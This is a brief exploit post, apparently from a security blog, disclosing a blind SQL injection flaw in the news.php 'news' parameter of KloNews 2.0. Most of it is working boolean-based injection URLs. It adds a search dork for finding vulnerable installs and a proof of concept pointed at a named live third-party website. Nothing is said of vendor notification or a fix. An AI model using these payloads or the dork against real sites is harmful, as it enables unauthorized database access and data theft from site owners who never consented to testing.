KloNews 2.0 Blind SQLi Vulnerability

[o] KloNews 2.0 Blind SQLi Vulnerability

Software : KloNews 2.0
Vendor : http://www.kloweb.net/
Author : NoGe

[o] Exploit

http://localhost/[path]/news.php?news=1+AND+SUBSTRING(@@version,1,1)=5 << True
http://localhost/[path]/news.php?news=1+AND+SUBSTRING(@@version,1,1)=4 << False

[o] Dork

"Propulsé par KloNews"

[o] PoC

http://saadacity.com/klonews/upload/news.php?news=1+AND+SUBSTRING(@@version,1,1)=5
http://saadacity.com/klonews/upload/news.php?news=1+AND+SUBSTRING(@@version,1,1)=4

Research Blog

Search This Blog

LFI to RCE via access_log injection

KloNews 2.0 Blind SQLi Vulnerability

Comments